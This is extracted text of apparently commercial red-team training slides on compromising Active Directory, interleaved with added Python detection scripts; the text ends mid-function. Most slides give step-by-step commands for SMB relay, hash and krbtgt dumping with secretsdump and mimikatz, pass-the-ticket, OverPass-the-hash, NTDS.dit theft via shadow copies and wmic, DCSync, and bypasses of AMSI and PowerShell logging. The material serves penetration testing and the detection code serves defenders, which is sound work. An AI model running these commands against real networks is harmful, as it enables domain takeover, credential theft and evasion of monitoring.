Now, we fire up Responder and wait…


>> python Responder.py –I eth0

Responder sends a poisoned answer to the admin’s machine

Snarf captures the SMB connection and keeps it alive

Click “choose” to
use a session.
PT e treme - Caendra Inc. © 2017
LLMNR and NBT-NS poisoning

We are now able to perform a variety of enumeration


activities, leveraging the active session. For example, like
share enumeration.
>> smbclient -L 127.0.0.1 -U whatever

You can supply any


username and
password. Snarf
automatically forwards
the captured user’s
credentials when
connecting to
127.0.0.1:445
PT e treme - Caendra Inc. © 2017
LLMNR and NBT-NS poisoning

…or checking if the built-in administrator account is disabled.


(This is important to understand if pass-the-hash is possible.)

>> net rpc shell -I 127.0.0.1

PT e treme - Caendra Inc. © 2017


LLMNR and NBT-NS poisoning
Most importantly, we can dump hashes from the targeted
machine, without executing any agent, using impacket’s
secretsdump.py.
>> python secretsdump.py ELS/whatever%[email protected]

PT e treme - Caendra Inc. © 2017


LLMNR and NBT-NS poisoning

Let’s try and crack this cached credential using JtR. Luckily,
the password was weak enough to crack it.
>> john --format=mscash2 --wordlist=/root/mydict.txt /root/2crack.txt

PT e treme - Caendra Inc. © 2017


LLMNR and NBT-NS poisoning

Finally, we use impacket’s wmiexec lateral movement


method, that does not touch disk and does not start any
new service.
>> python wmiexec.py ELS/Administrator:[email protected]

PT e treme - Caendra Inc. © 2017


LLMNR and NBT-NS poisoning

To sum up, this is how one can go from SMB relaying to


compromising a machine, without touching disk or enabling
a new service.

PT e treme - Caendra Inc. © 2017


LLMNR and NBT-NS poisoning

Undeniably, the methodology we described is more difficult


to implement than using MSF’s Smbrelay module, Impacket’s
Smbrelayx, or Responder’s Multirelay. It is stealthier though.

PT e treme - Caendra Inc. © 2017


This technique can also prove handy if you happened to relay
an unprivileged user. Let’s see why with an example. Suppose
we want to compromise the machine residing at 10.10.10.107.
We used Responder in conjunction with snarf, but we were
only able to relay the unprivileged user ‘employee4’.

PT e treme - Caendra Inc. © 2017


What we can do, leveraging this unprivileged user, is perform
some user enumeration activities, as follows.
>> net rpc registry enumerate 'HKEY_USERS' -I 127.0.0.1 -U 'ELS\whatever'

>> rpcclient 127.0.0.1 -U 'ELS\whatever' -c "lookupsids S-1-5-21-1770822258-1552498733-


1961591868-500"

We managed to identify
that an Administrator is
logged into 10.10.10.107
by SMB relaying an
unprivileged user

PT e treme - Caendra Inc. © 2017


User enumeration was possible because an unprivileged user
can query the HKU hive. By querying the HKU hive, one can
identify SIDs of logged in users.

Consequently, SMB relaying an unprivileged user and


keeping the session alive with snarf can prove useful,
especially if we haven’t gained an initial foothold yet.

PT e treme - Caendra Inc. © 2017


In this part, we will perform red-teaming activities against Active Directory.

We will focus on:

• stealthy exploitation and post-exploitation activities in order to completely compromise the targeted domain.


PowerShell Defenses in AD

PowerShell enables us to run code without touching disk, download and execute code from another system, interface with .NET and the Windows APIs, and much more.

Unfortunately, it has been abused over the last few years by penetration testers and cyber criminals alike. This is why, as of PowerShell v5 onwards, some quite effective security enhancements were introduced.

PowerShell v5 Security Enhancements

Red teamers have to tip-toe a little more carefully when PowerShell v5’s security enhancements are enabled. Let’s examine the security enhancements and see how they can be bypassed.

1. Script block logging

If the environment has script block logging enabled, then even if we are obfuscating our PowerShell code, it is going to be de-obfuscated before it’s executed by the PowerShell engine and logged to the event log as event ID 4104.

(Screenshot: script block logging in action.)

2. System-wide transcript file

If the environment has “system-wide transcript file” enabled, a share will exist on the network to which everything typed in PowerShell (the transcript file) is sent.

This means that the environment’s Blue Team will have an over-the-shoulder transcript of everything that was typed, for every computer/user. Following this slide, you can see a system-wide transcript file in action.

(Screenshot: system-wide transcript file in action.)

3. Constrained language mode

Constrained language mode limits the capability of PowerShell to base functionality. .NET or COM access and Win32 API calls through PowerShell are not possible when constrained language mode is enforced.

If an environment has PowerShell version 5 and AppLocker in allow mode, PowerShell locks down to constrained language mode automatically. The same will happen if Device Guard with UMCI is deployed. Following this slide, you can see constrained language mode in action.

(Screenshot: constrained language mode in action.)

NOTE: When heavily using PowerShell, be extra careful so that you don’t get caught by PowerShell metering software such as SCCM or AppLocker in audit mode.

4. AMSI (Anti-Malware Scan Interface)

In Windows 10, it gets even more interesting due to the introduction of AMSI (the Anti-Malware Scan Interface).

On AMSI-powered systems, any PowerShell or VBScript code is picked up by AMSI before it’s executed by the PowerShell engine. AMSI, in turn, sends it over to the anti-malware solution. The anti-malware solution will give a thumbs up or a thumbs down based on its signature database.

If it’s a thumbs down, PowerShell will not execute that code, whether it is downloaded from the internet and run in memory or run from a script.

Vendors that support AMSI include Microsoft, ESET and AVG. Following you can see AMSI in action.

(Screenshot: AMSI in action.)

Let’s now see how one can bypass those PowerShell v5 security enhancements.


Bypassing PowerShell’s Security Enhancements

AMSI Bypasses

There are ways to bypass AMSI. Matt Graeber, the author of PowerSploit, came up with a PowerShell cmdlet that bypasses AMSI using reflection.

Additionally, since reflection techniques are considered "suspicious" and can be caught by WMF5, he came up with an AMSI bypass that bypasses WMF5 auto-logging as well.

Around the same time, another AMSI bypass was implemented leveraging DLL hijacking, and then yet another bypass via COM hijacking.

Lee Christensen released unmanaged PowerShell (rolled into Metasploit), which allows us to call PowerShell commands and run PowerShell code without calling powershell.exe, among other things. This can also be considered an AMSI bypass (avoidance, actually).

Since we are talking about avoidance, if PowerShell v2 is present on a system, we should use it for our attacks. PowerShell v2 has none of the security enhancements we mentioned previously. It is not uncommon to see a system with both PowerShell v2 and v5 installed.

Make sure that you check PSAmsi. PSAmsi is a tool for auditing and defeating AMSI signatures. Additionally, this script includes various AMSI bypasses, all in one place.

Constrained Language Mode and PowerShell Logging Bypasses

One of the most beloved PowerShell attack tools, PS-Attack, is a single executable which contains some of the most popular and effective PowerShell attack tools out there.

It encrypts them into an executable. There’s a build tool as well, so we can custom encrypt our own. When PS-Attack runs, it decrypts these files or PowerShell functions in memory, where we can run them.

Guess what: constrained language mode is no longer a problem, because running PowerShell code from an executable bypasses the standard mechanism that handles constrained language mode. This happens due to compatibility reasons.

Following you can see a system where PowerShell is running in constrained language mode. PS-Attack was able to load Mimikatz successfully though.

(Screenshot: PS-Attack loading Mimikatz under constrained language mode.)

What about PowerShell logging? It bypasses that also!

Why does this happen? Let’s take Windows 7 as an example. On Windows 7 we have PowerShell v2 as our base-level PowerShell version, and when we install PowerShell version 5, version 5 kind of layers on top of that.

PS-Attack, through unmanaged PowerShell and some other fun trickery, actually calls System.Management.Automation.dll, that is PowerShell, at that lower version (version 2). This enables it to bypass PowerShell logging.

(Screenshot: PowerShell v5 is installed and PowerShell logging is configured. We see no events though…)

Smarter organizations will remove PowerShell v2 from Windows 10. This can be done by simply unchecking a box.

When that happens, the empty logs we saw previously will be filled with data when PS-Attack is executed.
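Added detection example (Python, not part of the course) covering the two points above: script block logging writes the de-obfuscated code to event 4104, split into numbered parts that must be reassembled before matching, and a v2 engine downgrade still leaves a trace in the classic Windows PowerShell log, whose event 400 is written by every engine version and carries the EngineVersion field. The 4104 and 400 message texts, script block IDs and host names below are constructed.

```python
import re
from collections import defaultdict

# Event 4104 (Microsoft-Windows-PowerShell/Operational): long script blocks arrive as "(n of total)" parts.
SCRIPTBLOCK_RE = re.compile(
    r"Creating Scriptblock text \((\d+) of (\d+)\):\n(.*?)\n\nScriptBlock ID: ([0-9a-fA-F-]+)\nPath: (.*)",
    re.DOTALL,
)
# Event 400 (classic "Windows PowerShell" log): engine start, logged by v2 as well as v5.
ENGINE_RE = re.compile(r"^\s*EngineVersion=(\d+)\.", re.MULTILINE)
HOST_RE = re.compile(r"^\s*HostName=(.+)$", re.MULTILINE)


def reassemble_script_blocks(events_4104):
    """Group 4104 parts by ScriptBlock ID and join them in order; returns id -> text/path/complete."""
    parts, totals, paths = defaultdict(dict), {}, {}
    for msg in events_4104:
        m = SCRIPTBLOCK_RE.search(msg.replace("\r\n", "\n"))
        if not m:
            continue
        num, total, text, block_id, path = m.groups()
        parts[block_id][int(num)] = text
        totals[block_id] = int(total)
        paths[block_id] = path.strip()
    return {
        bid: {
            "text": "".join(chunks[i] for i in sorted(chunks)),
            "complete": len(chunks) == totals[bid],
            "path": paths[bid],
        }
        for bid, chunks in parts.items()
    }


def flag_script_blocks(blocks, indicators):
    """Case-insensitive indicator match on the reassembled text; a split indicator is missed otherwise."""
    hits = []
    for bid, info in blocks.items():
        lowered = info["text"].lower()
        for ind in indicators:
            if ind.lower() in lowered:
                hits.append((bid, ind))
    return hits


def detect_v2_engine(events_400):
    """Hosts that started a PowerShell 2.0 engine: the downgrade that leaves the v5 logs empty."""
    hosts = []
    for msg in events_400:
        ver = ENGINE_RE.search(msg)
        if ver and int(ver.group(1)) == 2:
            host = HOST_RE.search(msg)
            hosts.append(host.group(1).strip() if host else "<unknown host>")
    return hosts


# Constructed sample events: one block split into three 4104 parts (delivered out of order), one
# single-part block, and two engine-start events (a v5 console and a v2 engine inside a custom host).
SAMPLE_4104 = [
    "Creating Scriptblock text (2 of 3):\nkatz -DumpCreds | Out-File \n\nScriptBlock ID: 7f1c3b52-0000-4000-8000-000000000001\nPath: ",
    "Creating Scriptblock text (1 of 3):\nInvoke-Mimi\n\nScriptBlock ID: 7f1c3b52-0000-4000-8000-000000000001\nPath: ",
    "Creating Scriptblock text (3 of 3):\nout.txt\n\nScriptBlock ID: 7f1c3b52-0000-4000-8000-000000000001\nPath: ",
    "Creating Scriptblock text (1 of 1):\nGet-Process | Sort-Object CPU\n\nScriptBlock ID: 7f1c3b52-0000-4000-8000-000000000002\nPath: C:\\scripts\\top.ps1",
]
SAMPLE_400 = [
    "Engine state is changed from None to Available. \n\nDetails: \n\tNewEngineState=Available\n\tPreviousEngineState=None\n\n"
    "\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.14393.0\n\tEngineVersion=5.1.14393.0\n",
    "Engine state is changed from None to Available. \n\nDetails: \n\tNewEngineState=Available\n\tPreviousEngineState=None\n\n"
    "\tSequenceNumber=9\n\n\tHostName=CustomHost\n\tHostVersion=2.0\n\tEngineVersion=2.0\n",
]
```

A 400 event with EngineVersion=2.0 on a machine where v5 is installed is the signal to act on; removing the v2 engine, as the slide says, makes it disappear together with the bypass.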


Constrained language mode is undeniably an effective PowerShell security measure. It can prevent a lot of PowerShell-based attacks.

It is not a panacea though. Keep in mind that bypassing constrained PowerShell is possible and not all PowerShell “attack scripts” will be blocked.

For more constrained language mode bypasses, you are encouraged to study the following two blog posts.
✓ https://improsec.com/blog//babushka-dolls-or-how-to-bypass-application-whitelisting-and-constrained-powershell
✓ http://www.exploit-monday.com/2017/08/exploiting-powershell-code-injection.html


Numerous paths exist following which an attacker can totally compromise Active Directory. We will cover the most effective ones.

The attack methods covered assume that the attacker has already gained an initial foothold on the network. Specifically, we will cover the following:

✓ MS14-068 Kerberos vulnerability
✓ Unconstrained Delegation & Credential reuse (pass-the-ticket)
✓ Credential reuse (OverPass-the-hash)
✓ Pivoting with Local Admin & Passwords in SYSVOL
✓ Dangerous built-in groups usage
✓ Dumping AD domain credentials
✓ Forging Golden Tickets (incl. abusing trust relationships)
✓ Kerberoast
✓ Forging Silver Tickets
✓ Forging Trust Tickets

The Mimikatz patch (KB2871997)

Since we are going to heavily use mimikatz in this module, we should not forget to mention that KB2871997 sets a registry key that prevents clear text passwords from being stored in LSASS. This patch can easily be subverted.

Additionally, a large percentage of the attacks we will cover do not require clear text passwords.

AMSI Evasion & Clear-text Passwords Despite the Mimikatz Patch


MS14-068

In an unpatched environment you may want to look for the MS14-068 Kerberos vulnerability. Exploiting this vulnerability enables the re-writing of a ticket from domain user to domain admin in 5 minutes.

The issue MS14-068 leverages is an insufficiently secure mechanism used by Domain Controllers to validate group membership in Kerberos tickets.

As of Windows Server 2012 (R2) onwards, this vulnerability cannot be easily exploited.

To exploit the above-mentioned vulnerability we can use PyKEK or the kekeo suite.

Kekeo scans for vulnerable DCs and requests a delegation ticket at the end. Actually, kekeo adds a last step that is missing from PyKEK: it uses the exploit-generated TGT to get an impersonation TGT which works everywhere.

For a detailed MS14-068 exploitation walkthrough please refer to the following link:

https://blog.cptjesus.com/posts/ms14068


Moving on, let’s see how one can leverage unconstrained delegation in order to escalate his privileges in the domain. As the attack scenario progresses, we will also introduce you to the pass-the-ticket Kerberos attack.

Unconstrained Delegation

(Diagram: Kerberos “double-hop” issue. Source: ADSecurity.org)

When AD was released, MS recommended using Kerberos. The problem is, the service ticket a user gets for the web server will not work on the database server. This means that the web server will not be able to perform actions on the database impersonating the user. This is called the Kerberos “double-hop issue.”

So, how did MS fix this? They came up with unconstrained delegation.

(Diagram: unconstrained delegation.)

To identify computers with Kerberos unconstrained delegation, we can simply use the following PowerView command.
>> Get-DomainComputer -Unconstrained

Running this command in our testing “ELS” domain returned the following.

(Screenshot: Get-DomainComputer -Unconstrained output.)

Why is unconstrained delegation so bad?

When a user requests a service ticket for a service running on a server which has unconstrained delegation, the DC takes a copy of the user’s TGT, puts it into the service ticket and delivers it back to the user.

So, when the user provides that service ticket to the server hosting the requested service, that TGT is placed in LSASS (in memory) for later use.

To identify privileged users whose credentials are not protected when interacting with a system featuring unconstrained delegation, we can use the following PowerView command.
>> Get-DomainUser -AllowDelegation -AdminCount

Running this command in our testing “ELS” domain returned the following.

(Screenshot: the 2ndAdmin user is a Domain Administrator whose credentials are not protected when interacting with a machine featuring unconstrained delegation.)
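Added example (Python, not PowerView’s code) showing what the two PowerView commands above actually test: the TRUSTED_FOR_DELEGATION and NOT_DELEGATED bits of userAccountControl. It builds LDAP filters with the same semantics (assumed, using the bit-AND matching rule), audits a constructed set of directory objects, and shows the remediation bit for a delegatable admin. The account list is constructed and only borrows the names from the slide’s scenario.

```python
# userAccountControl bits relevant to Kerberos delegation (ADS_USER_FLAG values).
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation: DC copies the caller's TGT into the service ticket
NOT_DELEGATED = 0x100000                     # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained delegation with protocol transition
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000                # domain controller computer account; DCs carry TRUSTED_FOR_DELEGATION by default
NORMAL_ACCOUNT = 0x200

# LDAP_MATCHING_RULE_BIT_AND: extensible-match rule that tests one bit of an integer attribute in a filter.
BIT_AND = "1.2.840.113556.1.4.803"


def unconstrained_filter():
    """Filter with the semantics of Get-DomainComputer -Unconstrained (assumed equivalent, not PowerView's own)."""
    return f"(&(objectCategory=computer)(userAccountControl:{BIT_AND}:={TRUSTED_FOR_DELEGATION}))"


def delegatable_admin_filter():
    """Filter with the semantics of Get-DomainUser -AllowDelegation -AdminCount (assumed equivalent)."""
    return (f"(&(samAccountType=805306368)(admincount=1)"
            f"(!(userAccountControl:{BIT_AND}:={NOT_DELEGATED})))")


def find_unconstrained_hosts(objects):
    """Computer accounts with TRUSTED_FOR_DELEGATION; DCs are listed separately because the flag is normal there."""
    hosts, dcs = [], []
    for obj in objects:
        uac = obj["userAccountControl"]
        if not obj["sAMAccountName"].endswith("$") or not uac & TRUSTED_FOR_DELEGATION:
            continue
        (dcs if uac & SERVER_TRUST_ACCOUNT else hosts).append(obj["sAMAccountName"])
    return {"non_dc": hosts, "dc": dcs}


def find_delegatable_admins(objects):
    """adminCount=1 user accounts whose TGT can be handed to an unconstrained host (NOT_DELEGATED is clear)."""
    return [o["sAMAccountName"] for o in objects
            if not o["sAMAccountName"].endswith("$")
            and o.get("adminCount") == 1
            and not o["userAccountControl"] & NOT_DELEGATED]


def hardened_uac(uac):
    """Remediation: mark the account sensitive so the DC never places its TGT inside a service ticket."""
    return uac | NOT_DELEGATED


# Constructed sample objects shaped like a directory search result (not the course's real ELS data).
SAMPLE_OBJECTS = [
    {"sAMAccountName": "LAB-DC01$", "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION, "adminCount": 0},
    {"sAMAccountName": "LAB-APP01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION, "adminCount": 0},
    {"sAMAccountName": "LAB-WS02$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT, "adminCount": 0},
    {"sAMAccountName": "2ndAdmin", "userAccountControl": NORMAL_ACCOUNT, "adminCount": 1},
    {"sAMAccountName": "Administrator", "userAccountControl": NORMAL_ACCOUNT | NOT_DELEGATED, "adminCount": 1},
    {"sAMAccountName": "employee4", "userAccountControl": NORMAL_ACCOUNT, "adminCount": 0},
]
```

Membership in the Protected Users group has the same protective effect as NOT_DELEGATED for the admin side; the host side is fixed by moving LAB-APP01$ to constrained delegation or removing the flag.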


Let’s see how we can leverage unconstrained delegation in a practical scenario, using the machine and the Domain Administrator account we identified previously.

Suppose we were able to social engineer the “2ndAdmin” Domain Administrator into connecting to the server featuring unconstrained delegation over a Kerberos service. Specifically, we lured the “2ndAdmin” Domain Administrator into connecting to a network share on the machine featuring unconstrained delegation.

(Screenshot from 2ndAdmin’s workstation.)

Note that the administrator doesn’t even have to type in his credentials; connecting to a network share is enough.

Of course, we should have compromised the server configured with unconstrained delegation prior to the following steps, through an admin or service account.

Through this network session, we can get 2ndAdmin’s TGT, then pass-the-ticket and, using PowerShell remoting, connect to a DC.

With access to a DC, we can dump the KRBTGT account’s password hash, which, as you will see later on, is an important asset to have.

Through our PowerShell Empire agent, we first dump and export all available tickets on the machine.
>> usemodule credentials/mimikatz/command
>> set Command sekurlsa::tickets /export
>> run

2ndAdmin’s TGT will be included, since he connected to the network share and his credentials were insufficiently protected.

(Screenshot: net session with the TGT.)

Now, we pass the ticket using the “kerberos::ptt” mimikatz command.
>> usemodule credentials/mimikatz/command
>> set Command kerberos::ptt [0;57b126][email protected]

We will use PowerShell remoting to connect to the DC, using the 2ndAdmin ticket we just passed to the compromised machine. To achieve that, we can use PowerShell Empire’s invoke_psremoting lateral movement method as follows.
>> usemodule lateral_movement/invoke_psremoting

(Screenshot: we successfully compromised the DC using PSRemoting with the 2ndAdmin ticket we captured and passed.)

Compromising the domain’s DC provides us with great power. As you will see later on, we can now create golden tickets, since we know the KRBTGT account’s password hash. The KRBTGT account’s password hash can be dumped as follows.
>> usemodule credentials/mimikatz/command
>> set Command sekurlsa::krbtgt

Constrained delegation can also be misconfigured in a way that allows lateral spread. Please refer to the following link for details:

http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/


OverPass-the-Hash (Making the best of NTLM password hashes)

When we are in possession of NTLM password hashes, we can pass-the-hash, but this is getting detected nowadays (event 4624). Not only is pass-the-hash getting detected, but specific internals prevent us from using it against newer systems.

For the specifics of those internals, as well as for understanding where we can perform pass-the-hash, refer to the link below.

http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/

What we could do instead is perform OverPass-the-hash.

By clearing out all the Kerberos encryption keys that are on a system and injecting an extracted NTLM password hash, we can take that password hash and switch it over so that we’re effectively using a Kerberos ticket. This is a lot more difficult to detect.

That way, when we connect to a Kerberos-enabled service, the normal Kerberos procedure is conducted, but with the NTLM password hash that we injected.

Let’s go through the whole OverPass-the-hash procedure and also show you how to make this attack stealthier.

After an initial compromise, we executed mimikatz on the compromised machine. Luckily, we found a Domain Administrator’s NTLM password hash.

Let’s see how we can execute an OverPass-the-hash attack and access the domain controller’s contents. We can just use PowerShell Empire’s credentials/mimikatz/pth module. If we choose this path, a mimikatz command similar to the following will be executed.

Executing “sekurlsa::pth” specifying only the NTLM password hash will likely cause an alert, since the encryption method of the Encrypted_Timestamp field of the AS_REQ message is actually being downgraded.

To make the OverPass-the-hash attack stealthier, we will also specify AES keys. Those AES keys can be extracted as follows, using Empire’s credentials/mimikatz/command module.
>> usemodule credentials/mimikatz/command
>> set Command sekurlsa::ekeys

Finally, we will execute the sekurlsa::pth command specifying the AES keys we extracted. Below you can see the result.
>> usemodule credentials/mimikatz/command
>> set Command sekurlsa::pth /user:2ndAdmin /domain:els.local /aes256:b3ed8ba2447b1f0e06d2ab072a4afd4a3f76fc4adb23a0f5c2827655c72de9fb /ntlm:49623ccc820122ab49b3f0f571b77186 /aes128:12345678901234567890123456789012 /run:notepad.exe

We can also specify aes128 keys, even if they don’t actually exist.

Now, to access the Domain Controller’s contents, we must steal the token from the spawned notepad process, as follows.
>> steal_token 3536
>> shell dir \\lab-dc01.els.local\C$

(Screenshot: the directory listing of the DC’s C$ share.)
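Added detection example (Python, not from the course): the downgrade the slides describe shows up on the DC as event 4768 with Ticket Encryption Type 0x17 (RC4-HMAC) for an account that has AES keys. The function below filters successful TGT requests of that kind, with an allowlist for genuinely legacy accounts. The 4768 message texts, client addresses and account names are constructed around the slide’s scenario.

```python
import re

RC4_HMAC = 0x17
AES_ETYPES = {0x11, 0x12}   # AES128-CTS-HMAC-SHA1-96, AES256-CTS-HMAC-SHA1-96

# Event 4768 message fields we care about (one "Name:\t\tvalue" per line).
FIELD_RE = re.compile(
    r"^\s*(Account Name|Supplied Realm Name|Client Address|Ticket Encryption Type|Result Code):\s*(\S+)",
    re.MULTILINE,
)


def parse_4768(text):
    """Extract account, realm, client address, etype and result code from a 4768 message."""
    f = dict(FIELD_RE.findall(text))
    return {
        "account": f.get("Account Name", ""),
        "realm": f.get("Supplied Realm Name", ""),
        "client": f.get("Client Address", "").replace("::ffff:", ""),
        "etype": int(f.get("Ticket Encryption Type", "0x0"), 16),
        "result": int(f.get("Result Code", "0x0"), 16),
    }


def rc4_tgt_requests(events, aes_capable_accounts, legacy_allowlist=()):
    """Successful RC4 TGT requests for accounts that normally use AES: the etype downgrade."""
    aes_capable = {a.lower() for a in aes_capable_accounts}
    allow = {a.lower() for a in legacy_allowlist}
    hits = []
    for text in events:
        ev = parse_4768(text)
        acct = ev["account"].lower()
        if ev["result"] != 0 or ev["etype"] != RC4_HMAC:
            continue                      # failed request, or already AES: nothing to flag
        if acct in allow or acct not in aes_capable:
            continue                      # legacy account, or one that never had AES keys
        hits.append((ev["account"], ev["client"]))
    return hits


# Constructed sample 4768 messages (not captured from the course lab).
SAMPLE_4768 = [
    # 2ndAdmin's TGT requested with RC4 only, from the compromised host: the downgrade
    "A Kerberos authentication ticket (TGT) was requested.\n"
    "Account Information:\n\tAccount Name:\t\t2ndAdmin\n\tSupplied Realm Name:\tels.local\n"
    "Network Information:\n\tClient Address:\t\t::ffff:10.10.10.107\n\tClient Port:\t\t49832\n"
    "Additional Information:\n\tTicket Options:\t\t0x40810010\n\tResult Code:\t\t0x0\n"
    "\tTicket Encryption Type:\t0x17\n\tPre-Authentication Type:\t2\n",
    # an ordinary AES256 logon
    "A Kerberos authentication ticket (TGT) was requested.\n"
    "Account Information:\n\tAccount Name:\t\temployee4\n\tSupplied Realm Name:\tels.local\n"
    "Network Information:\n\tClient Address:\t\t::ffff:10.10.10.55\n"
    "Additional Information:\n\tResult Code:\t\t0x0\n\tTicket Encryption Type:\t0x12\n",
    # a legacy service account that is still on RC4 by design
    "A Kerberos authentication ticket (TGT) was requested.\n"
    "Account Information:\n\tAccount Name:\t\tsvc_legacy\n\tSupplied Realm Name:\tels.local\n"
    "Network Information:\n\tClient Address:\t\t::ffff:10.10.10.20\n"
    "Additional Information:\n\tResult Code:\t\t0x0\n\tTicket Encryption Type:\t0x17\n",
    # a failed RC4 request (pre-authentication failed): not counted
    "A Kerberos authentication ticket (TGT) was requested.\n"
    "Account Information:\n\tAccount Name:\t\t2ndAdmin\n\tSupplied Realm Name:\tels.local\n"
    "Network Information:\n\tClient Address:\t\t::ffff:10.10.10.107\n"
    "Additional Information:\n\tResult Code:\t\t0x18\n\tTicket Encryption Type:\t0x17\n",
]
```

Once AES keys are supplied as well, as on the following slides, the 4768 looks normal and the remaining signal is host-side: the 4624 logon with logon type 9 (NewCredentials) that sekurlsa::pth creates on the compromised machine.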


Pivoting with Local Admin & Passwords in SYSVOL

It is not uncommon for the same set of credentials to be used across the domain. This is usually the case with local administrator accounts. If we identify those credentials, we can easily move laterally within the network.

Whenever a Group Policy Preference is created inside SYSVOL, an associated XML file is also created containing data relevant to the configuration to be deployed. If a password is included, it is encrypted with AES-256. It is not uncommon to come across local administrator passwords inside a GPP.

Microsoft released the AES encryption key, so always take a look at SYSVOL, which we remind you is world readable, for (local administrator) passwords.

A patch was released preventing the insertion of credentials in GPPs. Older credentials that were placed in SYSVOL before the patch will persist though.

Dangerous built-in groups usage

Organizations usually use built-in groups instead of custom delegation. Members of ‘Account Operators’ and ‘Print Operators’ can log on to the domain controller by default. Consequently, if we compromise a simple helpdesk account, we may be able to compromise the entire domain.

Dumping AD Domain Credentials

As simulated attackers, we want to dump domain credentials. That way we can be anyone we want, or maybe create golden tickets, as you will see later on.

The first way to do this is to locate the NTDS.dit file (the AD database file). The other way is to steal credentials.

Finding NTDS.dit on the network

Not everyone is familiar with the exact location of that database file in their environment. It could be found on DC backups or even on an external network storage device.

Additionally, a VMware administrator has the ability to clone a virtual DC within VMware. If we compromise such an administrator, we can clone a virtual DC. To access the NTDS.dit file, we don’t even have to start the clone; we can just copy down the storage files associated with it. No alarms are going to go off in AD or on the DC, because no event is triggered.

When we jump on a sensitive box, we may not want to use a tool like mimikatz. We can use Task Manager to dump LSASS into an LSASS dump file. Then, we can copy that somewhere else and run mimikatz against it there. It will be a little more difficult for them to discover that we were on that box. This LSASS dump file may include Domain Admin credentials.

Dumping LSASS (Using Task Manager)

(Screenshots: steps 1 and 2 of dumping LSASS using Task Manager.)

If we manage to extract Domain Administrator credentials, what we should do next is remotely get the NTDS.dit file and the SYSTEM registry hive. With those two files, we will be able to acquire every password hash of the domain. Let’s see some ways of remotely getting those files.

Remotely Get the DIT

Shadow volume creation, then copying NTDS.dit and the SYSTEM registry hive from the VSS snapshot to the C: drive:
>> wmic /node:DC_hostname /user:Domain\User /password:password process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > c:\vss.log"
>> wmic /node:DC_hostname /user:Domain\User /password:password process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\windows\temp\NTDS.dit 2>&1 > c:\vss2.log"
>> wmic /node:DC_hostname /user:Domain\User /password:password process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\windows\temp\SYSTEM.hive 2>&1 > c:\vss2.log"

Remotely Get the DIT (when no clear-text password exists)
>> wmic /authority:"Kerberos:Domain\DC_Hostname" /node:DC_hostname process call create

You will have to pass-the-ticket before executing this command.

Pulling the NTDS.dit remotely using PowerSploit’s Invoke-NinjaCopy is another option. Invoke-NinjaCopy leverages PS Remoting. You can use it from inside PowerShell Empire as follows.
>> usemodule collection/ninjacopy

We can also use NTDSUtil. NTDSUtil is a tool used by administrators to administer or manage the AD database. Access to the DC is required to execute NTDSUtil.

If we use NTDSUtil to create an “install from media” set, it makes a copy of the NTDS.dit (and the SYSTEM registry hive) for us.
>> ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q

Finally, to extract every password hash of the domain, we can use impacket’s secretsdump.py as follows.
>> python secretsdump.py -system /root/Desktop/temp/registry/SYSTEM -ntds /root/Desktop/temp/Active\ Directory/ntds.dit LOCAL

DCSync (mimikatz)

A better approach to acquiring all of the domain’s password hashes is DCSync. DCSync is a mimikatz feature that enables us to act as a Domain Controller and request password data from the targeted DC.

Before DCSync was introduced, what we had to do to extract the KRBTGT password was run Mimikatz or Invoke-Mimikatz on a DC.

DCSync enables us to pull password hashes (including previous ones) over the network without the interactive logon requirement and without pulling the NTDS.dit file.

Special rights are required in order to run DCSync. Members of the ‘Administrators’, ‘Domain Admins’ or ‘Enterprise Admins’ groups, as well as the DC computer account itself, can run DCSync.

The interesting thing is that a normal domain user can be delegated the rights needed to extract password data. Those rights are:

• Replicating Directory Changes
• Replicating Directory Changes All
• Replicating Directory Changes In Filtered Set (required in some environments)

For example, after domain compromise, we assigned the normal domain user “employee4” the rights needed for DCSync execution.

The employee4 user can now be used for stealthy persistence. As you can see below, he is now able to extract any password data using DCSync.
>> lsadump::dcsync /domain:els.local /user:ELS\krbtgt

During an engagement, you should also rely on obscure keylogging techniques to identify privileged credentials.
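Added detection example (Python, not from the course or mimikatz): a DCSync request is a replication call against the domain object, which the DC records as event 4662 with the Control Access mask and the extended-right GUIDs of the three rights listed above, provided Directory Service Access auditing is enabled. The filter below flags any requester that is not a DC computer account or an approved sync account, which is exactly how the delegated employee4 persistence would surface. The 4662 message texts are constructed; the employee4 and LAB-DC names follow the slide’s scenario.

```python
import re

# Extended rights DCSync relies on, keyed by the rightsGuid values from the AD schema.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100   # ADS_RIGHT_DS_CONTROL_ACCESS in the 4662 Access Mask

GUID_RE = re.compile(r"\{?([0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12})\}?")
FIELD_RE = re.compile(r"^\s*(Account Name|Account Domain|Access Mask):\s*(\S+)", re.MULTILINE)


def parse_4662(text):
    """Pull subject, access mask and the GUIDs listed under Properties out of a 4662 message."""
    fields = dict(FIELD_RE.findall(text))
    props = text.split("Properties:", 1)[1] if "Properties:" in text else ""
    return {
        "account": fields.get("Account Name", ""),
        "domain": fields.get("Account Domain", ""),
        "access_mask": int(fields.get("Access Mask", "0x0"), 16),
        "guids": [g.lower() for g in GUID_RE.findall(props)],
    }


def dcsync_alerts(events, dc_accounts, allowlist=()):
    """(account, [rights]) for every replication request not made by a DC or an approved sync account."""
    alerts = []
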